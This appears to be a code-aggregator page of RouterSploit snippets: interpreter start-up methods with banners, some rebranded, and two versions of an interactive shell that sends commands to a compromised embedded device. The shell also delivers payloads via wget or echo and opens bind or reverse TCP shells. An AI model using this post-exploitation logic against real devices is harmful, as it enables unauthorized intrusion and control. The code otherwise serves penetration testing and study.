Ejemplo n.º 1
    def __init__(self):
        """Initialise interpreter state, index the modules and build the banner.

        Side effects visible here: a ``PrinterThread`` is started, the module
        index is built with ``index_modules()``, ``MODULES_DIR`` is listed on
        disk and ``__parse_prompt`` is called.
        """
        super(RoutersploitInterpreter, self).__init__()
        PrinterThread().start()

        # No module is selected yet; the prompt templates start as None.
        self.current_module = None
        self.raw_prompt_template = None
        self.module_prompt_template = None
        self.prompt_hostname = "rsf"

        # Words accepted after "show" and "search".
        self.show_sub_commands = (
            "info", "options", "advanced", "devices", "all",
            "encoders", "creds", "exploits", "scanners", "wordlists",
        )
        self.search_sub_commands = (
            "type", "device", "language", "payload", "vendor",
        )

        # The trailing space on some entries is part of the command string.
        self.global_commands = sorted(
            ("use ", "exec ", "help", "exit", "show ", "search "))
        # Module-level commands are the module-only ones plus every global one.
        self.module_commands = sorted(
            ["run", "back", "set ", "setg ", "check"] + self.global_commands)

        self.modules = index_modules()
        # Tally modules by the first dotted component of their indexed name.
        self.modules_count = Counter(
            dotted.split('.')[0] for dotted in self.modules)

        # Entries of MODULES_DIR whose name does not start with "__".
        visible_dirs = []
        for entry in os.listdir(MODULES_DIR):
            if entry.startswith("__"):
                continue
            visible_dirs.append(entry)
        self.main_modules_dirs = visible_dirs

        self.__parse_prompt()

        # NOTE: codename, version and links in the banner are literals in this
        # file; only the six counters are computed at start-up.
        banner_template = """ ______            _            _____       _       _ _
 | ___ \\          | |          /  ___|     | |     (_) |
 | |_/ /___  _   _| |_ ___ _ __\\ `--. _ __ | | ___  _| |_
 |    // _ \\| | | | __/ _ \\ '__|`--. \\ '_ \\| |/ _ \\| | __|
 | |\\ \\ (_) | |_| | ||  __/ |  /\\__/ / |_) | | (_) | | |_
 \\_| \\_\\___/ \\__,_|\\__\\___|_|  \\____/| .__/|_|\\___/|_|\\__|
                                     | |
       Exploitation Framework for    |_|    by Threat9
            Embedded Devices

 Codename   : I Knew You Were Trouble
 Version    : 3.4.1
 Homepage   : https://www.threat9.com - @threatnine
 Join Slack : https://www.threat9.com/slack

 Join Threat9 Beta Program - https://www.threat9.com

 Exploits: {exploits_count} Scanners: {scanners_count} Creds: {creds_count} Generic: {generic_count} Payloads: {payloads_count} Encoders: {encoders_count}
"""
        tally = self.modules_count
        self.banner = banner_template.format(
            exploits_count=tally["exploits"],
            scanners_count=tally["scanners"],
            creds_count=tally["creds"],
            generic_count=tally["generic"],
            payloads_count=tally["payloads"],
            encoders_count=tally["encoders"],
        )
Ejemplo n.º 2
    def __init__(self):
        """Prepare the interpreter: state, module index, CLI handling, banner.

        Starts a ``PrinterThread``, builds the module index, lists
        ``MODULES_DIR``, hands ``sys.argv[1:]`` to
        ``__handle_if_noninteractive`` and then calls ``__parse_prompt``
        before the banner text is assembled.
        """
        super(RoutersploitInterpreter, self).__init__()
        PrinterThread().start()

        # Nothing selected yet; prompt templates are filled in later.
        self.current_module = None
        self.raw_prompt_template = None
        self.module_prompt_template = None
        self.prompt_hostname = "rsf"

        # Words accepted after "show".
        self.show_sub_commands = (
            "info", "options", "devices", "all", "encoders",
            "creds", "exploits", "scanners", "wordlists",
        )

        # Entries ending in a space keep that space as part of the command.
        self.global_commands = sorted(
            ("use ", "exec ", "help", "exit", "show ", "search "))
        self.module_commands = sorted(
            ["run", "back", "set ", "setg ", "check"] + self.global_commands)

        self.modules = index_modules()
        # Group the indexed names by their first dotted component and count.
        self.modules_count = Counter(
            dotted.split('.')[0] for dotted in self.modules)

        # Keep every MODULES_DIR entry except the "__"-prefixed ones.
        listed = os.listdir(MODULES_DIR)
        self.main_modules_dirs = list(
            filter(lambda entry: not entry.startswith("__"), listed))

        # Command-line arguments (without the program name) are processed
        # before the prompt is parsed and before the banner exists.
        self.__handle_if_noninteractive(sys.argv[1:])

        self.__parse_prompt()

        # NOTE: the codename, version and links below are hard-coded text;
        # nothing in this method derives them from package metadata.
        banner_template = """ ______            _            _____       _       _ _
 | ___ \\          | |          /  ___|     | |     (_) |
 | |_/ /___  _   _| |_ ___ _ __\\ `--. _ __ | | ___  _| |_
 |    // _ \\| | | | __/ _ \\ '__|`--. \\ '_ \\| |/ _ \\| | __|
 | |\\ \\ (_) | |_| | ||  __/ |  /\\__/ / |_) | | (_) | | |_
 \\_| \\_\\___/ \\__,_|\\__\\___|_|  \\____/| .__/|_|\\___/|_|\\__|
                                     | |
       Exploitation Framework for    |_|    by Threat9
            Embedded Devices

 Codename   : TecnoSolution
 Version    : 4.0.0
 YouTube    : https://www.youtube.com/channel/UCf9siCVepHU1juk-9YFztOg - @TecnoSolution
 Facebook   : https://www.facebook.com/TecnoSolution2019


 Exploits: {exploits_count} Scanners: {scanners_count} Creds: {creds_count} Generic: {generic_count} Payloads: {payloads_count} Encoders: {encoders_count}
"""
        tally = self.modules_count
        self.banner = banner_template.format(
            exploits_count=tally["exploits"],
            scanners_count=tally["scanners"],
            creds_count=tally["creds"],
            generic_count=tally["generic"],
            payloads_count=tally["payloads"],
            encoders_count=tally["encoders"],
        )
Ejemplo n.º 3
    def __init__(self):
        """Build the interpreter's initial state and its start-up banner.

        In order: start a ``PrinterThread``, set prompt and command
        attributes, index modules and count them per top-level name, list
        ``MODULES_DIR``, pass ``sys.argv[1:]`` to
        ``__handle_if_noninteractive``, call ``__parse_prompt`` and format
        the banner.
        """
        super(RoutersploitInterpreter, self).__init__()
        PrinterThread().start()

        # Prompt state: no current module, templates not yet parsed.
        self.current_module = None
        self.raw_prompt_template = None
        self.module_prompt_template = None
        self.prompt_hostname = "rsf"

        # Words accepted after "show".
        self.show_sub_commands = (
            "info",
            "options",
            "devices",
            "all",
            "encoders",
            "creds",
            "exploits",
            "scanners",
            "wordlists",
        )

        # A trailing space is part of the stored command where present.
        base_commands = ["use ", "exec ", "help", "exit", "show ", "search "]
        self.global_commands = sorted(base_commands)
        module_only = ["run", "back", "set ", "setg ", "check"]
        self.module_commands = sorted(module_only + self.global_commands)

        self.modules = index_modules()
        # One count per first dotted component of each indexed module name.
        self.modules_count = Counter(
            dotted.split('.')[0] for dotted in self.modules)

        # MODULES_DIR entries, minus anything whose name starts with "__".
        kept = []
        for entry in os.listdir(MODULES_DIR):
            if not entry.startswith("__"):
                kept.append(entry)
        self.main_modules_dirs = kept

        # Runs before the prompt is parsed and before self.banner is set.
        self.__handle_if_noninteractive(sys.argv[1:])

        self.__parse_prompt()

        # NOTE: version, codename and URLs are literal banner text; only the
        # per-category counters are filled in at run time.
        banner_template = """ ______            _            _____       _       _ _
 | ___ \\          | |          /  ___|     | |     (_) |
 | |_/ /___  _   _| |_ ___ _ __\\ `--. _ __ | | ___  _| |_
 |    // _ \\| | | | __/ _ \\ '__|`--. \\ '_ \\| |/ _ \\| | __|
 | |\\ \\ (_) | |_| | ||  __/ |  /\\__/ / |_) | | (_) | | |_
 \\_| \\_\\___/ \\__,_|\\__\\___|_|  \\____/| .__/|_|\\___/|_|\\__|
                                     | |
       Exploitation Framework for    |_|    by Threat9
            Embedded Devices

 Codename   : I Knew You Were Trouble
 Version    : 3.4.0
 Homepage   : https://www.threat9.com - @threatnine
 Join Slack : https://www.threat9.com/slack

 Join Threat9 Beta Program - https://www.threat9.com

 Exploits: {exploits_count} Scanners: {scanners_count} Creds: {creds_count} Generic: {generic_count} Payloads: {payloads_count} Encoders: {encoders_count}
"""
        tally = self.modules_count
        self.banner = banner_template.format(
            exploits_count=tally["exploits"],
            scanners_count=tally["scanners"],
            creds_count=tally["creds"],
            generic_count=tally["generic"],
            payloads_count=tally["payloads"],
            encoders_count=tally["encoders"],
        )
Ejemplo n.º 4
    def get_encoders(self):
        """Return ``(path, name, description)`` tuples for this architecture's encoders.

        Every indexed module name containing ``encoders.<self.architecture>``
        is imported from ``routersploit.modules``; its ``Encoder`` class
        supplies the ``name`` and ``description`` entries read from
        ``_Encoder__info__``.
        """
        arch = self.architecture
        marker = "encoders.{}".format(arch)
        path_prefix = "encoders.{}.".format(arch)

        # Substring test, not a prefix test: any indexed name that merely
        # contains the marker is selected.
        selected = [dotted for dotted in index_modules() if marker in dotted]

        rows = []
        for dotted in selected:
            relative = dotted.replace(path_prefix, "").replace(".", "/")
            # import_module runs the module's top-level code, so whatever
            # index_modules() enumerates is executed as trusted code here.
            encoder_cls = getattr(
                importlib.import_module('routersploit.modules.' + dotted),
                "Encoder")
            display_name = encoder_cls._Encoder__info__["name"]
            summary = encoder_cls._Encoder__info__["description"]
            rows.append(("{}/{}".format(arch, relative), display_name, summary))

        return rows
    def __init__(self):
        """Set initial interpreter attributes, index modules and format the banner.

        Starts a ``PrinterThread``, calls ``index_modules()``, lists
        ``MODULES_DIR``, forwards ``sys.argv[1:]`` to
        ``__handle_if_noninteractive`` and calls ``__parse_prompt``.
        """
        super(RoutersploitInterpreter, self).__init__()
        PrinterThread().start()

        # Prompt state before any module is chosen.
        self.current_module = None
        self.raw_prompt_template = None
        self.module_prompt_template = None
        self.prompt_hostname = "rsf"

        # Words accepted after "show".
        self.show_sub_commands = (
            "info", "options", "devices", "all", "encoders",
            "creds", "exploits", "scanners", "wordlists",
        )

        # Where a command ends in a space, the space is part of the string.
        self.global_commands = sorted(
            ("use ", "exec ", "help", "exit", "show ", "search "))
        self.module_commands = sorted(
            ["run", "back", "set ", "setg ", "check"] + self.global_commands)

        self.modules = index_modules()
        # Count indexed modules by the first dotted component of their name.
        self.modules_count = Counter(
            dotted.split('.')[0] for dotted in self.modules)

        # Directory entries of MODULES_DIR, skipping "__"-prefixed names.
        visible_dirs = []
        for entry in os.listdir(MODULES_DIR):
            if entry.startswith("__"):
                continue
            visible_dirs.append(entry)
        self.main_modules_dirs = visible_dirs

        # Command-line arguments are handled before the prompt is parsed.
        self.__handle_if_noninteractive(sys.argv[1:])

        self.__parse_prompt()

        # NOTE: everything in the banner except the six counters is literal
        # text, including the whitespace-only lines.
        banner_template = """ ______            _            _____       _       _ _
 
INDRO-SEKHAR-TRIDEEP

                                     | |
       Exploitation Framework    |_|   
            

 


 Exploits: {exploits_count} Scanners: {scanners_count} Creds: {creds_count} Generic: {generic_count} Payloads: {payloads_count} Encoders: {encoders_count}
"""
        tally = self.modules_count
        self.banner = banner_template.format(
            exploits_count=tally["exploits"],
            scanners_count=tally["scanners"],
            creds_count=tally["creds"],
            generic_count=tally["generic"],
            payloads_count=tally["payloads"],
            encoders_count=tally["encoders"],
        )
Ejemplo n.º 6
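def shell(exploit, architecture="", method="", payloads=None, **params):
    """Run the interactive ``cmd`` prompt bound to *exploit*.

    Input that is not one of the prompt's own commands is passed to
    ``exploit.execute`` and the result is printed. When both *architecture*
    and *method* are given, payload modules whose indexed name contains
    ``payloads.<architecture>`` are imported and offered through
    ``show payloads`` / ``set payload <payload>``.

    Args:
        exploit: object providing ``execute(cmd)`` and a ``target`` attribute.
        architecture: architecture name used to select payload modules.
        method: delivery method; ``run`` handles ``"wget"``, ``"echo"`` and
            ``"cmd"``.
        payloads: for ``method == "cmd"``, the collection a payload class's
            ``cmd`` attribute must be in to be offered. ``None`` is treated
            as an empty collection.
        **params: forwarded to ``Communication``; ``exec_binary`` is added
            here for the ``cmd`` method.

    Returns:
        None, once the user enters ``quit`` or ``exit``.
    """
    available_payloads = {}
    payload = None
    options = []

    if architecture and method:
        # Drop the literal "payloads." prefix. str.lstrip() takes a *set of
        # characters*, so lstrip('payloads.') would also strip leading
        # letters of the architecture that happen to be in that set.
        prefix = "payloads."
        all_payloads = [
            (p[len(prefix):] if p.startswith(prefix) else p).replace('.', '/')
            for p in index_modules()
            if "payloads.{}".format(architecture) in p
        ]

        # `payloads` defaults to None; a membership test against None would
        # raise TypeError, so treat it as "nothing allowed".
        allowed_cmds = payloads if payloads is not None else ()

        for p in all_payloads:
            # Importing runs the payload module's top-level code.
            module = getattr(importlib.import_module('routersploit.modules.payloads.' + p.replace('/', '.')), 'Payload')

            # if method/arch is cmd then filter out payloads
            if method == "cmd":
                if getattr(module, "cmd") in allowed_cmds:
                    available_payloads[p] = module
            else:
                available_payloads[p] = module

    print_info()
    print_success("Welcome to cmd. Commands are sent to the target via the execute method.")
    print_status("For further exploitation use 'show payloads' and 'set payload <payload>' commands.")
    print_info()

    while True:
        # Spin until the printer queue is empty before showing the prompt
        # (presumably so pending output is not interleaved with it).
        while not printer_queue.empty():
            pass

        if payload is None:
            cmd_str = "\001\033[4m\002cmd\001\033[0m\002 > "
        else:
            cmd_str = "\001\033[4m\002cmd\001\033[0m\002 (\033[94m{}\033[0m) > ".format(payload._Payload__info__["name"])

        cmd = input(cmd_str)

        if cmd in ["quit", "exit"]:
            return

        elif cmd == "show payloads":
            if not available_payloads:
                print_error("There are no available payloads for this exploit")
                continue

            print_status("Available payloads:")
            headers = ("Payload", "Name", "Description")
            data = []
            for p in available_payloads.keys():
                data.append((p, available_payloads[p]._Payload__info__["name"], available_payloads[p]._Payload__info__["description"]))

            print_table(headers, *data)

        elif cmd.startswith("set payload "):
            if not available_payloads:
                print_error("There are no available payloads for this exploit")
                continue

            c = cmd.split(" ")

            if c[2] in available_payloads.keys():
                payload = available_payloads[c[2]]()

                # Rebuild the option table for the newly selected payload:
                # [name, current value, description] per exposed attribute.
                options = []
                for option in payload.exploit_attributes.keys():
                    if option not in ["output", "filepath"]:
                        options.append([option, getattr(payload, option), payload.exploit_attributes[option][1]])

                if payload.handler == "bind_tcp":
                    options.append(["rhost", exploit.target, "Target IP address"])

                    if method == "wget":
                        options.append(["lhost", "", "Connect-back IP address for wget"])
                        options.append(["lport", 4545, "Connect-back Port for wget"])
            else:
                print_error("Payload not available")

        elif payload is not None:
            # With a payload selected, input that matches none of the
            # sub-commands below is ignored; it is NOT sent to the device.
            if cmd == "show options":
                headers = ("Name", "Current settings", "Description")

                print_info('\nPayload Options:')
                print_table(headers, *options)
                print_info()

            elif cmd.startswith("set "):
                c = cmd.split(" ")
                if len(c) != 3:
                    print_error("set <option> <value>")
                else:
                    # Only names already present in the option table can be
                    # assigned, so arbitrary attributes cannot be set.
                    for option in options:
                        if option[0] == c[1]:
                            try:
                                setattr(payload, c[1], c[2])
                            except Exception:
                                print_error("Invalid value for {}".format(c[1]))
                                break

                            option[1] = c[2]
                            print_info("{} => {}".format(c[1], c[2]))

            elif cmd == "run":
                data = payload.generate()

                if method == "wget":
                    elf_binary = payload.generate_elf(data)
                    communication = Communication(exploit, elf_binary, options, **params)
                    if communication.wget() is False:
                        print_error("Exploit failed to transfer payload")
                        continue

                elif method == "echo":
                    elf_binary = payload.generate_elf(data)
                    communication = Communication(exploit, elf_binary, options, **params)
                    communication.echo()

                elif method == "cmd":
                    params["exec_binary"] = data
                    communication = Communication(exploit, "", options, **params)

                else:
                    # No delivery step exists for this method; without this
                    # guard `communication` would be unbound below.
                    print_error("Unsupported delivery method '{}'".format(method))
                    continue

                if payload.handler == "bind_tcp":
                    communication.bind_tcp()
                elif payload.handler == "reverse_tcp":
                    communication.reverse_tcp()

            elif cmd == "back":
                payload = None

        else:
            # No payload selected: anything not handled above, including a
            # mistyped local command, is forwarded verbatim to the device.
            print_status("Executing '{}' on the device...".format(cmd))
            print_info(exploit.execute(cmd))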
Ejemplo n.º 7
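def shell(exploit, architecture="", method="", payloads=None, **params):
    """Interactive ``cmd`` loop that relays input to *exploit*.

    Lines that are not recognised as local commands are handed to
    ``exploit.execute`` and the returned value is printed. If *architecture*
    and *method* are both set, payload modules whose indexed name contains
    ``payloads.<architecture>`` are imported up front and can be selected
    with ``set payload <payload>``.

    Args:
        exploit: object providing ``execute(cmd)`` and a ``target`` attribute.
        architecture: architecture name used to pick payload modules.
        method: delivery method; ``run`` supports ``"wget"``, ``"echo"`` and
            ``"cmd"``.
        payloads: with ``method == "cmd"``, only payload classes whose
            ``cmd`` attribute is in this collection are offered. ``None``
            is handled as an empty collection.
        **params: passed through to ``Communication``; the ``cmd`` method
            stores the generated data under ``exec_binary``.

    Returns:
        None, when ``quit`` or ``exit`` is entered.
    """
    available_payloads = {}
    payload = None
    options = []

    if architecture and method:
        # get all payloads for given architecture
        all_payloads = [p.replace("payloads.", "").replace(".", "/") for p in index_modules() if "payloads.{}".format(architecture) in p]

        # The default payloads=None cannot be used with `in`; fall back to
        # an empty tuple so the "cmd" filter offers nothing instead of
        # raising TypeError.
        permitted = () if payloads is None else payloads

        for p in all_payloads:
            # import_module executes the payload module's top-level code.
            module = getattr(importlib.import_module("routersploit.modules.payloads." + p.replace("/", ".")), "Payload")

            # if method/arch is cmd then filter out payloads
            if method == "cmd":
                if getattr(module, "cmd") in permitted:
                    available_payloads[p] = module
            else:
                available_payloads[p] = module

    print_info()
    print_success("Welcome to cmd. Commands are sent to the target via the execute method.")
    print_status("For further exploitation use 'show payloads' and 'set payload <payload>' commands.")
    print_info()

    while True:
        # Busy-wait until printer_queue reports empty, then prompt.
        while not printer_queue.empty():
            pass

        if payload is None:
            cmd_str = "\001\033[4m\002cmd\001\033[0m\002 > "
        else:
            cmd_str = "\001\033[4m\002cmd\001\033[0m\002 (\033[94m{}\033[0m) > ".format(payload._Payload__info__["name"])

        cmd = input(cmd_str)

        if cmd in ["quit", "exit"]:
            return

        elif cmd == "show payloads":
            if not available_payloads:
                print_error("There are no available payloads for this exploit")
                continue

            print_status("Available payloads:")
            headers = ("Payload", "Name", "Description")
            data = []
            for p in available_payloads.keys():
                data.append((p, available_payloads[p]._Payload__info__["name"], available_payloads[p]._Payload__info__["description"]))

            print_table(headers, *data)

        elif cmd.startswith("set payload "):
            if not available_payloads:
                print_error("There are no available payloads for this exploit")
                continue

            c = cmd.split(" ")

            if c[2] in available_payloads.keys():
                payload = available_payloads[c[2]]()

                # One [name, current value, description] row per payload
                # attribute, leaving out "output" and "filepath".
                options = []
                for option in payload.exploit_attributes.keys():
                    if option not in ["output", "filepath"]:
                        options.append([option, getattr(payload, option), payload.exploit_attributes[option][1]])

                if payload.handler == "bind_tcp":
                    options.append(["rhost", exploit.target, "Target IP address"])

                    if method == "wget":
                        options.append(["lhost", "", "Connect-back IP address for wget"])
                        options.append(["lport", 4545, "Connect-back Port for wget"])
            else:
                print_error("Payload not available")

        elif payload is not None:
            # While a payload is selected, unrecognised input falls through
            # this branch silently and never reaches exploit.execute().
            if cmd == "show options":
                headers = ("Name", "Current settings", "Description")

                print_info('\nPayload Options:')
                print_table(headers, *options)
                print_info()

            elif cmd.startswith("set "):
                c = cmd.split(" ")
                if len(c) != 3:
                    print_error("set <option> <value>")
                else:
                    # setattr is reached only for names listed in `options`.
                    for option in options:
                        if option[0] == c[1]:
                            try:
                                setattr(payload, c[1], c[2])
                            except Exception:
                                print_error("Invalid value for {}".format(c[1]))
                                break

                            option[1] = c[2]
                            print_info("{} => {}".format(c[1], c[2]))

            elif cmd == "run":
                data = payload.generate()

                if method == "wget":
                    elf_binary = payload.generate_elf(data)
                    communication = Communication(exploit, elf_binary, options, **params)
                    if communication.wget() is False:
                        print_error("Exploit failed to transfer payload")
                        continue

                elif method == "echo":
                    elf_binary = payload.generate_elf(data)
                    communication = Communication(exploit, elf_binary, options, **params)
                    communication.echo()

                elif method == "cmd":
                    params["exec_binary"] = data
                    communication = Communication(exploit, "", options, **params)

                else:
                    # Any other method leaves `communication` unassigned;
                    # report it rather than fail with UnboundLocalError.
                    print_error("Unsupported delivery method '{}'".format(method))
                    continue

                if payload.handler == "bind_tcp":
                    communication.bind_tcp()
                elif payload.handler == "reverse_tcp":
                    communication.reverse_tcp()

            elif cmd == "back":
                payload = None

        else:
            # Reached only with no payload selected: every other line, typos
            # of local commands included, is executed on the device as-is.
            print_status("Executing '{}' on the device...".format(cmd))
            print_info(exploit.execute(cmd))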